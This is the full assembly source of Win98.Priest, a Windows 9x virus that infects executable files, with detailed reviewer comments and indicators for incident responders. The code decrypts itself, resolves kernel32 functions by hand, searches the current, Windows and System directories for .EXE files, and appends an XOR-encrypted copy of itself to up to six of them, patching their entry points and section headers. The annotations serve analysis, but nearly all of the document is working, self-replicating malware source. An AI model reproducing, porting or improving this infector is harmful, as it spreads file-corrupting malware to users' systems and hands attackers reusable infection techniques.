; Win98.Priest
;
; NOTE(review): historical Windows 9x PE file infector, kept in this corpus as
; an analysis artefact.  The comments below only describe what the listed code
; does; no instruction has been changed, corrected or "improved".  Everything
; under .code is one flat control flow: decrypt self, locate kernel32 through
; a hard-coded base, resolve a handful of APIs by name, infect up to 6 *.EXE
; files in the current, Windows and System directories, then jump to the
; host's original entry point.
;
; Environment assumptions visible in the code (why this only works on Win9x):
;   - kernel32.dll is assumed to be mapped at KER32 = 0BFF70000h;
;   - the host (and every candidate file) must have ImageBase 400000h;
;   - W_ENC reads I/O port 40h (8254 timer) from ring 3 for key material;
;   - the decryptor writes into its own code, so the section carrying the
;     virus has to be writable at run time.
;
; Indicators an IR analyst can take from the code below: marker word '^^' at
; offset 12h of the MZ header (e_csum) of an infected file; AddressOfEntryPoint
; moved to the end of the last section; the last section's Characteristics
; forced to 0C0000040h (initialized data, read, write, no execute bit);
; SizeOfImage grown twice; the body is XOR-encrypted with a rolling key, but
; the strings 'Win98.Priest' and 'SVS/COREA/MOV' are recoverable once the
; decryptor has run; file names containing v/V/n/N are skipped.
.386
.model flat
extrn ExitProcess:PROC                  ; used only by the dropper stub at F_END

KER32 equ 0bff70000h                    ; hard-coded kernel32 image base (Win9x)

; The equates below are byte offsets into a scratch area whose base is kept in
; EBP from OK_SE onwards.  That area is not part of the virus image: it is the
; unused slack of a read/write section of the running host (see CHk_se).  The
; code never initialises it; chkif/chkdi are simply assumed to start at zero
; (loader-zeroed slack, presumably).
Limit equ 0000h                         ; kernel32 export NumberOfNames + KER32 (see FIND_SRC_2)
addname equ 0004h                       ; kernel32 AddressOfNames (VA); advanced during the name search
addfun equ 0008h                        ; kernel32 AddressOfFunctions (VA)
addord equ 000Ch                        ; kernel32 AddressOfNameOrdinals (VA)
; Slots 10h..38h receive resolved API addresses, in the order of the name
; strings listed after W_ENC_END (filled by the FIND_FUN loop):
create equ 0010h                        ; CreateFileA
close equ 0014h                         ; _lclose
rfile equ 0018h                         ; ReadFile
ffind equ 001ch                         ; FindFirstFileA
nfind equ 0020h                         ; FindNextFileA
white equ 0024h                         ; WriteFile
fpoin equ 0028h                         ; SetFilePointer
getw equ 002ch                          ; GetWindowsDirectoryA
gets equ 0030h                          ; GetSystemDirectoryA
getc equ 0034h                          ; GetCurrentDirectoryA
srchc equ 0038h                         ; FindClose
getp equ 003ch                          ; GetProcAddress (resolved by hand from the export table)
shand equ 0040h                         ; FindFirstFileA search handle
fhand equ 0044h                         ; handle of the file being infected
reads equ 0048h                         ; lpNumberOfBytesRead/Written scratch dword
OLDEDI equ 004ch                        ; not referenced anywhere in this listing
chkif equ 0050h                         ; files infected this run; the loop stops at 6
chkdi equ 0054h                         ; directory phase: 0 = current, 2 = Windows, 3 = System
WICHI equ 0058h                         ; pointer into exew where the file name is appended
exew equ 005ch                          ; path buffer; 0A8h (100h-58h) is passed as its size to the directory APIs
DATAA equ 0200h                         ; WIN32_FIND_DATAA buffer (nFileSizeLow at +20h, cFileName at +2Ch)
heads equ 0300h                         ; 400h-byte copy of the target's headers; the W_ENC stub is copied to heads+400h
.code
Start_Virus:
        Call Delta_Offset
Delta_Offset:
        Pop Ebp
        Sub Ebp,Offset Delta_Offset     ; EBP = load delta (actual address of Start_Virus minus assembled address)
        pushad                          ; host registers, restored at VIRUS_BODY
KEY_CODE:
        mov EAX,00h                     ; decryption key; the imm32 at KEY_CODE+1 is patched by W_ENC at infection time
        LEA eSI,[VIRUS_BODY+EBP]
        mov ecx,End_Virus - VIRUS_BODY -4
KEYCODE:
        XOR DWORD ptr [esi],eax         ; dword XOR at every byte offset from VIRUS_BODY to End_Virus-4;
                                        ; the final byte of the range (high byte of OLDIP) is never touched
        add esi,1
        xchg al,ah                      ; key schedule: swap the low bytes, rotate right by one.
        ror eax,1                       ; ENCRY_E uses the same schedule, so applying it twice is the identity
        loop KEYCODE
VIRUS_BODY:
        popad
        push eax                        ; entry-time EAX, which the code below treats as the address of
                                        ; Start_Virus (it is used as the base for 'offset x - Start_Virus').
                                        ; This appears to rely on a Win9x loader property; nothing verifies it.
        mov eax,[OLDIP+ebp]
        add eax,400000h                 ; host's original entry point as a VA (image base assumed 400000h)
        push eax                        ; stack from here on: [host EP VA][virus base]; consumed by R_IP
        call Scan_DATA                  ; ESI -> 'PE\0\0' of the running host, searched from 400000h
        mov EDI,ESI
        add ESI,6
        cmp word ptr [esi],0            ; NumberOfSections == 0 -> run the host untouched
        je R_IP
        xor ecx,ecx
        mov cx,[esi]
        add ESI,0f2h
        add ESI,24h                     ; ESI -> Characteristics of section header 0 (PE+0F8h+24h)
        add edi,0f8h                    ; EDI -> section header 0 (an 0E0h-byte optional header is assumed)
CHk_se:
        ; Find a readable+writable section with at least 700h + sizeof(W_ENC
        ; stub) bytes between its SizeOfRawData and its VirtualSize rounded up
        ; to 512.  That slack becomes the scratch area addressed through EBP.
        mov eax,[esi]
        and eax,0c0000000h
        cmp eax,0c0000000h              ; IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
        jne Next_Se
        mov eax,[edi+8h]                ; VirtualSize
        mov ebx,511
        add eax,ebx
        xor edx,edx
        inc ebx
        div ebx
        mul ebx                         ; EAX = VirtualSize rounded up to a multiple of 512
        sub eax,[edi+10h]               ; minus SizeOfRawData = uninitialised slack
        cmp eax,700h+(W_ENC_END - W_ENC)
        jge OK_SE
Next_Se:
        add esi,28h
        add edi,28h
        loop CHk_se
        JMP R_IP                        ; no usable section: run the host untouched
OK_SE:
        mov esi,[edi+0ch]               ; VirtualAddress
        add esi,[edi+10h]               ; + SizeOfRawData
        add esi,400000h
        mov ebp,ESI                     ; EBP now = scratch area base; the load delta is not needed any more
        ; Walk kernel32's export directory by hand at the hard-coded base.
        xor eax,eax
        mov esi,KER32+3ch
        lodsw                           ; e_lfanew, low 16 bits only
        add eax,KER32
        cmp dword ptr [eax],00004550h   ; 'PE\0\0'; fails (host runs untouched) when kernel32 is not at KER32
        jne R_IP
        mov esi,[eax+78h]               ; DataDirectory[EXPORT].VirtualAddress
        add esi,24                      ; -> IMAGE_EXPORT_DIRECTORY.NumberOfNames
        add esi,KER32
        lodsd
        add eax,KER32
        mov [ebp+Limit],eax             ; NumberOfNames + KER32 (see the 16-bit compare in FIND_SRC_2)
        lodsd
        add eax,KER32
        mov [ebp+addfun],eax            ; AddressOfFunctions
        lodsd
        add eax,KER32
        mov [ebp+addname],eax           ; AddressOfNames
        lodsd
        add eax,KER32
        mov [ebp+addord],eax            ; AddressOfNameOrdinals
        pop eax
        pop ebx                         ; EBX = virus base (peek; both values are pushed back)
        push ebx
        push eax
        mov esi,ebx
        add esi,offset gp - Start_Virus ; ESI -> 'GetProcAddress'
        mov ebx,esi
        mov edi,[ebp+addname]
        mov edi,[edi]
        add edi,KER32                   ; EDI -> first export name
        xor ecx,ecx
        call FIND_SRC                   ; ECX = index of the matching name; does not return on failure
        shl ecx,1
        mov esi,[ebp+addord]
        add esi,ecx
        xor eax,eax
        mov ax,word ptr [esi]           ; ordinal
        shl eax,2
        mov esi,[ebp+addfun]
        add esi,eax
        mov edi,[esi]
        add edi,KER32
        mov [getp+ebp],edi              ; GetProcAddress resolved
        mov ebx,create                  ; first API slot to fill
        pop eax
        pop edi                         ; EDI = virus base (peek)
        push edi
        push eax
        add edi,offset cf - Start_Virus ; EDI -> 'CreateFileA', first of the NUL-separated name list
FIND_FUN:
        ; Resolve the 11 names cf..fc into slots create..srchc.
        push edi
        push KER32
        call [getp+ebp]                 ; GetProcAddress(KER32, name); stored without a NULL check
        mov [ebx+ebp],eax
        add ebx,4
        cmp ebx,getp
        je OK_FIND_FILE
        mov al,0
        repne scasb                     ; advance past the NUL.  ECX is not set here: it holds whatever
                                        ; GetProcAddress left (ECX is caller-saved), so the scan is unbounded in practice
        jmp FIND_FUN
OK_FIND_FILE:
        lea eax,[ebp+exew]
        push eax
        push 100h - 58h
        call [getc+ebp]                 ; GetCurrentDirectoryA(0A8h, exew)
        or eax,eax
        je CHG_DIR                      ; CHG_DIR will call FindClose on shand, which is still 0 here
OK_EXE:
        ; Build '<dir><sep>*.EXE' in exew and start a FindFirstFileA enumeration.
        lea esi,[ebp+DATAA]
        push esi                        ; lpFindFileData
        lea edi,[ebp+exew]
        push edi                        ; lpFileName
scan_dir:
        cmp byte ptr [edi],00h
        je ok_make_exe
        add edi,1
        jmp scan_dir                    ; EDI -> terminating NUL of the directory path
ok_make_exe:
        mov al,''                       ; character literal is empty in this copy (lost in transcription);
                                        ; it is the byte written between the directory path and the pattern
        stosb
        mov dword ptr [ebp+WICHI],edi   ; file names are later copied to this position
        mov ax,'.*'                     ; little-endian: writes "*."
        stosw
        mov eax,'EXE'                   ; writes "EXE",0
        stosd
        call [ebp+ffind]                ; FindFirstFileA(exew, DATAA)
        mov [ebp+shand],eax
        cmp eax,-1                      ; INVALID_HANDLE_VALUE -> run the host (no FindClose on this path)
        je R_IP
        mov eax,0
open_file:
        ; Skip any file whose name contains v, n, V or N (cFileName at DATAA+2Ch).
        cmp byte ptr [ebp+DATAA+2ch+eax],'v'
        je NEXT_FILE
        cmp byte ptr [ebp+DATAA+2ch+eax],'n'
        je NEXT_FILE
        cmp byte ptr [ebp+DATAA+2ch+eax],'V'
        je NEXT_FILE
        cmp byte ptr [ebp+DATAA+2ch+eax],'N'
        je NEXT_FILE
        cmp byte ptr [ebp+DATAA+2ch+eax],0
        je open_file_start
        add eax,1
        jmp open_file
open_file_start:
        mov edi,dword ptr [ebp+WICHI]
        mov ecx,20
        lea esi,[ebp+DATAA+2ch]
        repz movsb                      ; copies exactly 20 bytes of cFileName onto the path, whatever its length
        push 0                          ; hTemplateFile
        push 0                          ; dwFlagsAndAttributes
        push 3                          ; OPEN_EXISTING
        push 0                          ; lpSecurityAttributes
        push 0                          ; dwShareMode = 0 (exclusive)
        push 0c0000000h                 ; GENERIC_READ | GENERIC_WRITE
        lea eax,[ebp+exew]
        push eax
        call [ebp+create]               ; CreateFileA
        mov [ebp+fhand],eax
        cmp eax,-1                      ; INVALID_HANDLE_VALUE; File_Close still calls _lclose on it
        je File_Close
        mov ecx,400h
        lea edx,[ebp+heads]
        lea eax,[ebp+reads]
        push 0
        push eax
        push ecx
        push edx
        push dword ptr [ebp+fhand]
        call [ebp+rfile]                ; ReadFile(fhand, heads, 400h, &reads, NULL)
        cmp eax,0
        je File_Close
        ; Target checks: MZ, PE, ImageBase 400000h, not already marked, <= 6 sections.
        cmp word ptr [ebp+heads],'ZM'   ; "MZ"
        jne File_Close
        xor eax,eax
        lea esi,[ebp+heads+3ch]
        lodsw                           ; e_lfanew, low 16 bits only
        add eax,ebp
        add eax,heads
        mov esi,eax                     ; ESI -> PE header inside the heads buffer
        lea ebx,[ebp+heads+400h]
        cmp eax,ebx
        jg File_Close                   ; only the signature position is bounded; the optional header and
                                        ; section table read below are not checked against the 400h bytes read
        cmp word ptr [eax],'EP'         ; "PE"
        jne File_Close
        cmp dword ptr [eax+34h],400000h ; ImageBase must be 400000h (hard-coded at run time above)
        jne File_Close
        cmp word ptr [ebp+heads+12h],'^^' ; infection marker in the MZ header (e_csum)
        je File_Close
        cmp word ptr [esi+6],6          ; NumberOfSections > 6 -> skip
        jg File_Close
        xor ecx,ecx
        mov edi,esi
        mov cx,word ptr [esi+6]
        add edi,0f8h
CHK_DATA:
        ; Require at least one read+write section (the infected file needs one
        ; as scratch space when it runs, see CHk_se).  The section found here is
        ; not used otherwise: the virus is always appended after the LAST section.
        add edi,24h
        mov eax,dword ptr [edi]
        and eax,0c0000000h
        cmp eax,0c0000000h
        je OK_INFECT
        add edi,4h
        loop CHK_DATA
        jmp File_Close
OK_INFECT:
        mov eax,[ebp+DATAA+20h]         ; nFileSizeLow
        call F_SEEK                     ; seek to the original end of file
        mov edi,[esi+28h]               ; host AddressOfEntryPoint (RVA)
        pop ebx
        pop eax                         ; EAX = virus base (peek)
        push eax
        push ebx
        add eax,offset OLDIP - Start_Virus
        mov dword ptr [eax],edi         ; store the host EP in the in-memory image (OLDIP) before it is encrypted
        mov eax,offset End_Virus - Start_Virus
        mov ecx,[esi+3ch]               ; FileAlignment
        add eax,ecx
        xor edx,edx
        div ecx
        mul ecx                         ; virus size rounded up to FileAlignment (one unit larger when already aligned)
        add dword ptr [esi+50h],eax     ; SizeOfImage += that (first growth)
        mov ecx,eax
        pop eax                         ; EAX = host EP VA
        pop ebx                         ; EBX = virus base
        mov edx,ebx
        push ebx
        push eax
        push ecx                        ; aligned size, popped at r_body into EBX
        push ecx                        ; aligned size, popped at r_body into ECX
        mov ecx,End_Virus - Start_Virus
        pushad
        push edx                        ; virus base, popped inside W_ENC
        ; Copy the W_ENC..W_ENC_END stub to heads+400h and jump into the copy.
        ; It runs from there because it encrypts the virus image in place,
        ; including the code that would otherwise be executing.
        add edx,offset W_ENC - Start_Virus
        mov esi,edx
        lea ebp,[ebp+heads]
        add ebp,400h
        mov edi,ebp
        push edi
        mov cx,offset W_ENC_END - W_ENC
        repz movsb
        pop edi
        jmp edi
r_body:
        ; Re-entered from the copied stub after the encrypted body has been
        ; written.  The popad restores EBP (scratch base) and ESI (PE header
        ; inside heads).
        popad
        pop ecx
        sub ecx,offset End_Virus - Start_Virus
        mov edx,400000h
        call fwrite                     ; pad the appended block up to the aligned size; the padding bytes
                                        ; are copied from the host's own image at 400000h
        ; Compute, in FileAlignment units, the gap between the end of the last
        ; section's raw data and the original end of file, then fix up headers.
        mov eax,[ebp+DATAA+20h]
        mov ecx,[esi+3ch]               ; FileAlignment
        mov edx,0
        div ecx                         ; EAX = filesize / align, EDX = filesize % align
        push edx
        push eax
        mov edi,esi
        mov ax,word ptr [esi+6]         ; only AX is loaded; bits 16..31 of EAX still hold the quotient
                                        ; from the div above (zero for files smaller than 10000h alignment units)
        sub eax,1
        mov ecx,28h
        mul ecx
        add eax,0f8h
        add edi,eax                     ; EDI -> last section header
        xor edx,edx
        mov eax,[edi+14h]               ; PointerToRawData
        mov ecx,[esi+3ch]
        div ecx
        pop edx
        sub edx,eax
        push edx                        ; (filesize - PointerToRawData) in align units
        mov eax,[edi+10h]               ; SizeOfRawData
        sub eax,1
        add eax,ecx
        xor edx,edx
        div ecx                         ; ceil(SizeOfRawData / align)
        mov ebx,eax
        pop eax
        sub eax,ebx
        mul ecx
        pop edx
        add eax,edx                     ; EAX = gap in bytes (units * align + filesize % align)
        add dword ptr [esi+50h],eax     ; SizeOfImage += gap (second growth)
        mov ebx,[edi+0ch]               ; VirtualAddress
        add ebx,[edi+10h]               ; + SizeOfRawData
        add ebx,eax                     ; + gap
        mov [esi+28h],ebx               ; new AddressOfEntryPoint = where Start_Virus lands in the last section
        pop ebx                         ; aligned virus size
        add ebx,eax
        add [edi+8h],ebx                ; VirtualSize += gap + aligned size
        add [edi+10h],ebx               ; SizeOfRawData += gap + aligned size
        mov [edi+24h],0c0000040h        ; Characteristics = INITIALIZED_DATA | READ | WRITE (no EXECUTE bit)
        mov word ptr [ebp+heads+12h],'^^' ; set the infection marker
        mov eax,0
        call F_SEEK
        lea edx,[ebp+heads]
        mov ecx,400h
        call fwrite                     ; write the patched first 400h bytes back
        inc dword ptr chkif[ebp]
File_Close:
        push dword ptr [ebp+fhand]
        call [ebp+close]                ; _lclose
        cmp dword ptr chkif[ebp],6
        je CHG_DIR
NEXT_FILE:
        lea eax,[ebp+DATAA]
        push eax
        push dword ptr [ebp+shand]
        call [ebp+nfind]                ; FindNextFileA(shand, DATAA)
        cmp eax,0
        je CHG_DIR
        jmp open_file
CHG_DIR:
        ; Directory sequence: current dir -> Windows dir (chkdi 0->2) -> System
        ; dir (chkdi 2->3) -> host.  Ends early once 6 files have been infected.
        push dword ptr [shand+ebp]
        call [ebp+srchc]                ; FindClose
        cmp dword ptr chkif[ebp],6
        je R_IP
        cmp dword ptr chkdi[ebp],1
        jg CHG_DIR_2
        add dword ptr chkdi[ebp],2
        push 100h-58h
        lea eax,[ebp+exew]
        push eax
        call [ebp+getw]                 ; GetWindowsDirectoryA(exew, 0A8h)
        or eax,eax
        je CHG_DIR_2
        jmp OK_EXE
CHG_DIR_2:
        cmp dword ptr chkdi[ebp],2
        jg R_IP
        add dword ptr chkdi[ebp],1
        push 100h-58h
        lea eax,[ebp+exew]
        push eax
        call [ebp+gets]                 ; GetSystemDirectoryA(exew, 0A8h)
        or eax,eax
        je R_IP
        jmp OK_EXE
Scan_DATA:
        ; Linear search for 'PE\0\0' starting at 400000h.  Only CX is loaded
        ; while LOOP decrements the full ECX, so the upper half is whatever the
        ; caller had.  On exhaustion it falls into R_IP with its own return
        ; address still on the stack (unlike NOT_SRC, which pops it first).
        mov esi,400000h
        mov cx,600h
Scan_PE:
        cmp dword ptr [esi],00004550h
        je R_CO
        inc esi
        loop Scan_PE
R_IP:
        ; Hand control to the host: EAX = host EP VA, EBX = virus base, both
        ; pushed at VIRUS_BODY.  No other register is restored here.
        pop eax
        pop ebx
        jmp eax
R_CO:
        ret
FIND_SRC:
        ; Find the NUL-terminated string at EBX in kernel32's export name table.
        ; In:  EDI -> current export name, ECX = its index.
        ; Out: ECX = index of the match, EDI -> just past the matched bytes.
        ; An export that is a strict prefix of the wanted name also matches.
        mov esi,ebx
X_M:
        cmpsb
        jne FIND_SRC_2
        cmp byte ptr [edi],0
        je R_CO
        jmp X_M
FIND_SRC_2:
        inc cx
        cmp cx,[ebp+Limit]              ; 16-bit compare against NumberOfNames+KER32; works only because
                                        ; the low word of KER32 is zero
        jge NOT_SRC
        add dword ptr [ebp+addname],4   ; advances the stored AddressOfNames cursor itself
        mov edi,[ebp+addname]
        mov edi,[edi]
        add edi,KER32
        jmp FIND_SRC
NOT_SRC:
        pop esi                         ; drop FIND_SRC's return address
        jmp R_IP                        ; GetProcAddress not found: run the host untouched
F_SEEK:
        ; SetFilePointer(fhand, EAX, NULL, FILE_BEGIN)
        push 0
        push 0
        push eax
        push dword ptr [ebp+fhand]
        call [ebp+fpoin]
        ret
W_ENC:
        ; Executes from its copy at heads+400h (EDI = that address on entry), so
        ; the relative CALL/JMP targets inside the stub resolve to the copied
        ; ENCRY_E / fwrite.  Stack on entry: [virus base][pushad frame]
        ; [aligned size][aligned size][host EP][virus base].
        in al,40h                       ; two reads of the 8254 timer counter (port 40h) as key material;
        xchg al,ah                      ; ring-3 port I/O is tolerated on Win9x, not on NT-family systems
        in al,40h
        add eax,edi                     ; key = timer bytes + address of the stub copy
        add edi,offset ENCRY_E - W_ENC +1
        mov dword ptr [edi],eax         ; patch the key into the copied ENCRY_E's 'mov eax,imm32'
        pop edx                         ; virus base
        add edx,offset KEY_CODE - Start_Virus +1
        mov dword ptr [edx],eax         ; patch the same key into the decryptor of the image about to be written
        popad
        pushad                          ; reload the frame: EDX = virus base, ECX = virus size, EBP = scratch base
        mov esi,edx
        add esi,offset VIRUS_BODY - Start_Virus
        mov ecx,offset End_Virus - VIRUS_BODY -4
        call ENCRY_E                    ; encrypt the live image in place (same range as KEYCODE)
        popad
        pushad
        call fwrite                     ; WriteFile(fhand, virus base, End_Virus - Start_Virus)
        popad
        pushad
        mov esi,edx
        add esi,offset VIRUS_BODY - Start_Virus
        mov ecx,offset End_Virus - VIRUS_BODY -4
        call ENCRY_E                    ; decrypt again so the running copy keeps working
        popad
        pushad
        add edx,offset r_body - Start_Virus
        jmp edx                         ; back into the original image at r_body
ENCRY_E:
        ; XOR ECX dwords, one per byte offset from ESI, with the rolling key
        ; (imm32 patched by W_ENC).  Same schedule as KEYCODE, so running it
        ; twice over the same range restores the data.
        mov eax,00h
ENCRY:
        xor dword ptr [esi],eax
        xchg al,ah
        ror eax,1
        inc esi
        loop ENCRY
        ret
fwrite:
        ; WriteFile(fhand, EDX, ECX, &reads, NULL)
        push 0
        lea eax,[ebp+reads]
        push eax
        push ecx
        push edx
        push dword ptr [ebp+fhand]
        call [ebp+white]
        ret
W_ENC_END:
; Import names, NUL separated, in the order of the API slots create..srchc,
; followed by the name used for the hand-rolled GetProcAddress lookup.
cf db 'CreateFileA',0
cl db '_lclose',0
rf db 'ReadFile',0
ff db 'FindFirstFileA',0
fn db 'FindNextFileA',0
wf db 'WriteFile',0
sf db 'SetFilePointer',0
gw db 'GetWindowsDirectoryA',0
gs db 'GetSystemDirectoryA',0
gc db 'GetCurrentDirectoryA',0
fc db 'FindClose',0
gp db 'GetProcAddress',0
vn db 'Win98.Priest'                    ; name and author tag: encrypted in infected files (inside the
db 'SVS/COREA/MOV'                      ; KEYCODE range), plaintext in the dropper whose key is 0
OLDIP dd F_END - 400000h                ; host entry-point RVA; in the dropper it points at the exit stub below
End_Virus:
F_END:
; Dropper only: OLDIP sends control here after the virus has run and the
; process exits.  Not part of the copied image (End_Virus - Start_Virus).
        push 0
        call ExitProcess
end Start_Virus